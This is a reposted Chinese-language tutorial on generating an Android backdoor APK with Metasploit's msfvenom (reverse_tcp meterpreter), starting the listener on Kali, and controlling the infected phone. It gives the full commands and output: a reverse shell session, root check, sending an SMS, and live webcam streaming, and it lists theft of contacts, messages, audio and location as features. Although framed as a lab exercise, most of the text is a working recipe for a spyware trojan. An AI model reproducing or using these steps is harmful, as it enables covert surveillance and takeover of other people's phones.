Kali之Metasploit生成apk后門控制安卓

本文轉載自查看原文 2018-02-08 09:44 5890 信息安全

掃盲教程，大佬勿噴。

實驗中請更改為你環境的IP。

生成apk后門

Kali Linux（Hack）：192.168.169.76

Android（靶機）：192.168.169.137

啟動kali，開終端，生成apk后門。僅有9.2k的apk，也是蠻吊

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9486 bytes

lhost為kali的ip，lport指定一個端口。

開metasploit控制台偵聽

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp #設置payload
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
lhost => 192.168.169.76
msf exploit(handler) > set lport 445 #對應剛才設的端口
lport => 445
msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.169.76:445
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.169.137
[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400

復制apk出來裝到手機上打開后就可以exploit了，會看到會話反彈回來。

可以看下幫助都有啥操作

meterpreter > help

功能示例

讀取聯系人，信息，拍照，錄音，獲取位置信息，上傳下載文件等等，還是挺強大的。

#系統信息
meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android

#查看root狀態
meterpreter > check_root 
[+] Device is rooted

#發送短信
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d  <opt>  Destination number
    -dr        Wait for delivery report
    -h         Help Banner
    -t  <opt>  SMS body text


meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >

#網頁視頻聊天（我手機沒合適瀏覽器沒打開）
meterpreter > webcam_chat 
[*] Webcam chat session initialized.
[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine


#網頁攝像頭視頻流，顯示實時畫面
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: lwqAtUFm.html
[*] Streaming...

Kali之Metasploit生成apk后門控制安卓

補充freebuf上的文章：

如何獲取安卓iOS上的微信聊天記錄、通過Metasploit控制安卓

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 使用Kali的metasploit生成安卓APK木馬控制安卓手機 Kali環境使用Metasploit生成木馬入侵安卓手機通過Metasploit生成各種后門 Metasploit 生成各種后門 metasploit安卓木馬利用kali生成木馬遠程控制安卓手機 Metasploit生成木馬入侵安卓手機使用kali中metasploit生成木馬控制windows系統使用Kali中的Metasploit生成木馬控制Windows系統使用Kali中的Metasploit生成木馬控制Windows系統